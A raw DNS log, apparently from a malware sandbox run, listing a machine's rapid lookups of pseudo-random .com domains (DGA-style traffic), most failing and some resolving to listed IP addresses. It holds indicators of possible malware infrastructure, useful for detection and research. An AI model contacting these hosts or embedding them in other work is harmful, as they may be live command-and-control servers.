Aug 23, 2024 18:47:41.918814898 CEST	1.1.1.1	192.168.2.4	0xcbcb	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.918827057 CEST	1.1.1.1	192.168.2.4	0x49b3	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.918837070 CEST	1.1.1.1	192.168.2.4	0x9344	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.919059992 CEST	1.1.1.1	192.168.2.4	0xd4f9	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.919070959 CEST	1.1.1.1	192.168.2.4	0x1b7a	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.919080973 CEST	1.1.1.1	192.168.2.4	0x1e5e	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.922295094 CEST	1.1.1.1	192.168.2.4	0xcf28	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.922307014 CEST	1.1.1.1	192.168.2.4	0xa5c4	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.922317028 CEST	1.1.1.1	192.168.2.4	0x7d66	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.922327995 CEST	1.1.1.1	192.168.2.4	0xe8d3	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.922338963 CEST	1.1.1.1	192.168.2.4	0x1937	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.924315929 CEST	1.1.1.1	192.168.2.4	0xf977	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.924329042 CEST	1.1.1.1	192.168.2.4	0x9bc5	Name error (3)	vowycac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.924339056 CEST	1.1.1.1	192.168.2.4	0xc000	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.925523043 CEST	1.1.1.1	192.168.2.4	0xa9a2	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.925523043 CEST	1.1.1.1	192.168.2.4	0xa9a2	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.930591106 CEST	1.1.1.1	192.168.2.4	0x64e	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.933372021 CEST	1.1.1.1	192.168.2.4	0x6ad5	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.935926914 CEST	1.1.1.1	192.168.2.4	0x713c	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.939321041 CEST	1.1.1.1	192.168.2.4	0x90de	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.940069914 CEST	1.1.1.1	192.168.2.4	0x45d6	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.942749977 CEST	1.1.1.1	192.168.2.4	0xa770	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.942760944 CEST	1.1.1.1	192.168.2.4	0xa1e0	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.943224907 CEST	1.1.1.1	192.168.2.4	0x1e49	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.945923090 CEST	1.1.1.1	192.168.2.4	0x1686	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.945935965 CEST	1.1.1.1	192.168.2.4	0x7c47	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.951323032 CEST	1.1.1.1	192.168.2.4	0xd87f	No error (0)	galyqaz.com		199.191.50.83	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.951335907 CEST	1.1.1.1	192.168.2.4	0xa7f	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.952439070 CEST	1.1.1.1	192.168.2.4	0x26e2	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.958957911 CEST	1.1.1.1	192.168.2.4	0x6096	No error (0)	vojyqem.com		172.234.222.143	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.958957911 CEST	1.1.1.1	192.168.2.4	0x6096	No error (0)	vojyqem.com		172.234.222.138	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.963223934 CEST	1.1.1.1	192.168.2.4	0x8400	No error (0)	vocyzit.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:41.983977079 CEST	1.1.1.1	192.168.2.4	0x7a7a	No error (0)	lymyxid.com		3.94.10.34	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.013031006 CEST	1.1.1.1	192.168.2.4	0xadc7	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.015325069 CEST	1.1.1.1	192.168.2.4	0x19a6	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.015974998 CEST	1.1.1.1	192.168.2.4	0xa527	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.016002893 CEST	1.1.1.1	192.168.2.4	0x9918	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.016225100 CEST	1.1.1.1	192.168.2.4	0xcec1	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.016225100 CEST	1.1.1.1	192.168.2.4	0xcec1	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.016309977 CEST	1.1.1.1	192.168.2.4	0x57ae	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.016470909 CEST	1.1.1.1	192.168.2.4	0x9823	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.016488075 CEST	1.1.1.1	192.168.2.4	0x8200	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.016916037 CEST	1.1.1.1	192.168.2.4	0xaf76	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.017982006 CEST	1.1.1.1	192.168.2.4	0x7ce8	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.018748999 CEST	1.1.1.1	192.168.2.4	0x457b	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.019704103 CEST	1.1.1.1	192.168.2.4	0x51a1	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.019715071 CEST	1.1.1.1	192.168.2.4	0x10fe	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.020045042 CEST	1.1.1.1	192.168.2.4	0x1089	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.022185087 CEST	1.1.1.1	192.168.2.4	0x874e	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.022716999 CEST	1.1.1.1	192.168.2.4	0x9785	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.023468971 CEST	1.1.1.1	192.168.2.4	0xbcf0	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.023854971 CEST	1.1.1.1	192.168.2.4	0x7576	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.023865938 CEST	1.1.1.1	192.168.2.4	0x2c6a	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.024059057 CEST	1.1.1.1	192.168.2.4	0x2d18	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.024068117 CEST	1.1.1.1	192.168.2.4	0xa07b	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.031871080 CEST	1.1.1.1	192.168.2.4	0x2193	No error (0)	lyvyxor.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.037496090 CEST	1.1.1.1	192.168.2.4	0xc6af	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.038096905 CEST	1.1.1.1	192.168.2.4	0xbf25	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.038108110 CEST	1.1.1.1	192.168.2.4	0x62f	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.041096926 CEST	1.1.1.1	192.168.2.4	0xc7b	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.051160097 CEST	1.1.1.1	192.168.2.4	0x1b3	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.054160118 CEST	1.1.1.1	192.168.2.4	0x4e64	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.089272976 CEST	1.1.1.1	192.168.2.4	0x69e2	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.100159883 CEST	1.1.1.1	192.168.2.4	0x356d	No error (0)	vonypom.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.165682077 CEST	1.1.1.1	192.168.2.4	0x3497	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.170911074 CEST	1.1.1.1	192.168.2.4	0xed0d	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.205738068 CEST	1.1.1.1	192.168.2.4	0xab60	No error (0)	vocyzit.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.211807013 CEST	1.1.1.1	192.168.2.4	0x1d17	No error (0)	vojyqem.com		172.234.222.143	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.211807013 CEST	1.1.1.1	192.168.2.4	0x1d17	No error (0)	vojyqem.com		172.234.222.138	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.231192112 CEST	1.1.1.1	192.168.2.4	0xca4a	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.347837925 CEST	1.1.1.1	192.168.2.4	0xf9d5	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.347837925 CEST	1.1.1.1	192.168.2.4	0xf9d5	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.347837925 CEST	1.1.1.1	192.168.2.4	0xf9d5	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.347837925 CEST	1.1.1.1	192.168.2.4	0xf9d5	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.347837925 CEST	1.1.1.1	192.168.2.4	0xf9d5	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.347837925 CEST	1.1.1.1	192.168.2.4	0xf9d5	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.347837925 CEST	1.1.1.1	192.168.2.4	0xf9d5	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.347837925 CEST	1.1.1.1	192.168.2.4	0xf9d5	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.679574966 CEST	1.1.1.1	192.168.2.4	0x7ce1	Name error (3)	gahyraw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.680053949 CEST	1.1.1.1	192.168.2.4	0x8b7a	Name error (3)	lyrygyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.716909885 CEST	1.1.1.1	192.168.2.4	0x7c79	Name error (3)	qegyrol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.720671892 CEST	1.1.1.1	192.168.2.4	0x8902	Name error (3)	qexyxuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.720856905 CEST	1.1.1.1	192.168.2.4	0x1c6f	Name error (3)	lygywor.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.721312046 CEST	1.1.1.1	192.168.2.4	0xc7a4	Name error (3)	gacycus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.728065014 CEST	1.1.1.1	192.168.2.4	0xb2fd	Name error (3)	vocycuc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.743776083 CEST	1.1.1.1	192.168.2.4	0xe811	Name error (3)	vowygem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.745014906 CEST	1.1.1.1	192.168.2.4	0x13de	Name error (3)	pufywil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.745031118 CEST	1.1.1.1	192.168.2.4	0x2dd0	Name error (3)	purygeg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.748043060 CEST	1.1.1.1	192.168.2.4	0xe238	Name error (3)	vofyqit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.748086929 CEST	1.1.1.1	192.168.2.4	0x7922	Name error (3)	qedyqup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.748096943 CEST	1.1.1.1	192.168.2.4	0x5ca2	Name error (3)	puzyxyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.748475075 CEST	1.1.1.1	192.168.2.4	0xca77	Name error (3)	lysymux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.748493910 CEST	1.1.1.1	192.168.2.4	0x37b	Name error (3)	volyzef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.748497963 CEST	1.1.1.1	192.168.2.4	0x24f9	Name error (3)	pupymyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.748694897 CEST	1.1.1.1	192.168.2.4	0xb4ee	Name error (3)	qekylag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.749772072 CEST	1.1.1.1	192.168.2.4	0xfd23	Name error (3)	lykylan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.751144886 CEST	1.1.1.1	192.168.2.4	0xad29	Name error (3)	vojykom.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.751636982 CEST	1.1.1.1	192.168.2.4	0x8c08	Name error (3)	puvypul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.751648903 CEST	1.1.1.1	192.168.2.4	0x7378	Name error (3)	vopymyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.752485991 CEST	1.1.1.1	192.168.2.4	0x3ae2	Name error (3)	qebysul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.752499104 CEST	1.1.1.1	192.168.2.4	0xb536	Name error (3)	gahykih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.752509117 CEST	1.1.1.1	192.168.2.4	0xfddb	Name error (3)	lyrynad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.753433943 CEST	1.1.1.1	192.168.2.4	0x2831	Name error (3)	gacypyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.753444910 CEST	1.1.1.1	192.168.2.4	0x3ee4	Name error (3)	vocypyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.753997087 CEST	1.1.1.1	192.168.2.4	0x1ac6	Name error (3)	gatynes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.764895916 CEST	1.1.1.1	192.168.2.4	0xb549	Name error (3)	gaqyvob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.765010118 CEST	1.1.1.1	192.168.2.4	0xe60b	Name error (3)	lygyjuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.765019894 CEST	1.1.1.1	192.168.2.4	0x84f8	Name error (3)	qexytep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.766412973 CEST	1.1.1.1	192.168.2.4	0xdc55	Name error (3)	lyxytex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.767266989 CEST	1.1.1.1	192.168.2.4	0xbd16	Name error (3)	vofyjuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.770513058 CEST	1.1.1.1	192.168.2.4	0xace3	Name error (3)	gaqyfah.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.771791935 CEST	1.1.1.1	192.168.2.4	0xd1a0	Name error (3)	pumycug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.771804094 CEST	1.1.1.1	192.168.2.4	0xcadf	Name error (3)	galyros.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.773216963 CEST	1.1.1.1	192.168.2.4	0xe363	Name error (3)	volyrac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.773227930 CEST	1.1.1.1	192.168.2.4	0xcd10	Name error (3)	qekyrov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.774018049 CEST	1.1.1.1	192.168.2.4	0xea54	Name error (3)	lysyger.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.774028063 CEST	1.1.1.1	192.168.2.4	0x51dd	Name error (3)	galyzeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.774036884 CEST	1.1.1.1	192.168.2.4	0xe81b	Name error (3)	qeqyfaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.775365114 CEST	1.1.1.1	192.168.2.4	0x2ff3	Name error (3)	pupygel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.775377035 CEST	1.1.1.1	192.168.2.4	0x2894	Name error (3)	vonycum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.775386095 CEST	1.1.1.1	192.168.2.4	0xc55d	Name error (3)	pumydoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.775396109 CEST	1.1.1.1	192.168.2.4	0x2ce1	Name error (3)	gadyquz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.775403976 CEST	1.1.1.1	192.168.2.4	0xcbf	Name error (3)	vonydik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.775413990 CEST	1.1.1.1	192.168.2.4	0x77da	Name error (3)	vopygat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.775422096 CEST	1.1.1.1	192.168.2.4	0x8494	Name error (3)	lymyfoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.775432110 CEST	1.1.1.1	192.168.2.4	0x5c6	Name error (3)	qetynev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.777003050 CEST	1.1.1.1	192.168.2.4	0x1361	Name error (3)	lyvysur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.777014017 CEST	1.1.1.1	192.168.2.4	0xe732	Name error (3)	lyxyxyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.777023077 CEST	1.1.1.1	192.168.2.4	0x50be	Name error (3)	qegykiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.777026892 CEST	1.1.1.1	192.168.2.4	0x84e	Name error (3)	purybav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.784141064 CEST	1.1.1.1	192.168.2.4	0x91d7	Name error (3)	vowybof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.784929037 CEST	1.1.1.1	192.168.2.4	0xaa5b	Name error (3)	pufyjuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.788659096 CEST	1.1.1.1	192.168.2.4	0x97cf	Name error (3)	gadyhyw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.789921045 CEST	1.1.1.1	192.168.2.4	0x780b	Name error (3)	qedyhyl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.789932013 CEST	1.1.1.1	192.168.2.4	0x727b	Name error (3)	qeqyvig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.790178061 CEST	1.1.1.1	192.168.2.4	0xf86f	Name error (3)	lymyvin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.791445017 CEST	1.1.1.1	192.168.2.4	0xad6e	Name error (3)	qebyxyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.792632103 CEST	1.1.1.1	192.168.2.4	0x55ab	Name error (3)	lykywid.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.793958902 CEST	1.1.1.1	192.168.2.4	0x9739	Name error (3)	puzytap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.795661926 CEST	1.1.1.1	192.168.2.4	0x54a	Name error (3)	ganycuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.895463943 CEST	1.1.1.1	192.168.2.4	0xd973	Name error (3)	pujylog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.896992922 CEST	1.1.1.1	192.168.2.4	0xeb62	Name error (3)	ganydiw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.954108953 CEST	1.1.1.1	192.168.2.4	0x6f04	Name error (3)	gatyfaz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.956621885 CEST	1.1.1.1	192.168.2.4	0xa362	Name error (3)	pujywiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.957956076 CEST	1.1.1.1	192.168.2.4	0x2cd4	Name error (3)	lyvyxyj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.980217934 CEST	1.1.1.1	192.168.2.4	0x4b51	Name error (3)	lyryfox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.980422974 CEST	1.1.1.1	192.168.2.4	0x7b4	Name error (3)	vocyzek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.980434895 CEST	1.1.1.1	192.168.2.4	0xb58f	Name error (3)	puvyxeq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.987920046 CEST	1.1.1.1	192.168.2.4	0x4f5	Name error (3)	vowydic.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.989089966 CEST	1.1.1.1	192.168.2.4	0x4b08	Name error (3)	vojyquf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.991472006 CEST	1.1.1.1	192.168.2.4	0x66f9	Name error (3)	gacyzaw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.992587090 CEST	1.1.1.1	192.168.2.4	0xcdc1	Name error (3)	pufymyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:42.993823051 CEST	1.1.1.1	192.168.2.4	0x6c7d	Name error (3)	gaqydus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.000443935 CEST	1.1.1.1	192.168.2.4	0xea9d	Name error (3)	gahyqub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.011876106 CEST	1.1.1.1	192.168.2.4	0x68df	Name error (3)	purydip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.018037081 CEST	1.1.1.1	192.168.2.4	0x62c6	Name error (3)	lygymyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.019850969 CEST	1.1.1.1	192.168.2.4	0x1ac5	Name error (3)	vofymem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.020633936 CEST	1.1.1.1	192.168.2.4	0xd015	Name error (3)	qexylal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.021745920 CEST	1.1.1.1	192.168.2.4	0x51f7	Name error (3)	lysynaj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.021972895 CEST	1.1.1.1	192.168.2.4	0x8976	Name error (3)	galykiz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.021984100 CEST	1.1.1.1	192.168.2.4	0xb7e6	Name error (3)	qedynaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.022636890 CEST	1.1.1.1	192.168.2.4	0x8c6e	Name error (3)	gadyneh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.022960901 CEST	1.1.1.1	192.168.2.4	0x938	Name error (3)	vonypyf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.024473906 CEST	1.1.1.1	192.168.2.4	0xbe94	Name error (3)	pumypyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.025856972 CEST	1.1.1.1	192.168.2.4	0xe6dd	Name error (3)	qekykup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.027247906 CEST	1.1.1.1	192.168.2.4	0x4	Name error (3)	ganypeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.032399893 CEST	1.1.1.1	192.168.2.4	0xbfb6	Name error (3)	lykyjux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.035598040 CEST	1.1.1.1	192.168.2.4	0x25bd	Name error (3)	lyxylor.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.041318893 CEST	1.1.1.1	192.168.2.4	0x31c4	Name error (3)	qeqysuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.043823004 CEST	1.1.1.1	192.168.2.4	0x2fc9	Name error (3)	volykit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.048794985 CEST	1.1.1.1	192.168.2.4	0xcb2f	Name error (3)	lymysud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.051276922 CEST	1.1.1.1	192.168.2.4	0x4af3	Name error (3)	pupyboq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.058598995 CEST	1.1.1.1	192.168.2.4	0xf101	Name error (3)	gatyviw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.058866024 CEST	1.1.1.1	192.168.2.4	0x1c2d	Name error (3)	pujyjup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.082287073 CEST	1.1.1.1	192.168.2.4	0x1288	Name error (3)	lyvytan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.083039045 CEST	1.1.1.1	192.168.2.4	0x5541	Name error (3)	qetyvil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.083419085 CEST	1.1.1.1	192.168.2.4	0xe67b	Name error (3)	vojyjyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.084275007 CEST	1.1.1.1	192.168.2.4	0x20a3	Name error (3)	qegyhev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.085153103 CEST	1.1.1.1	192.168.2.4	0xef9f	Name error (3)	gacyroh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:47:43.085994959 CEST	1.1.1.1	192.168.2.4	0x522f	Name error (3)	pufygav.com	none	none	A (IP address)	IN (0x0001)	false
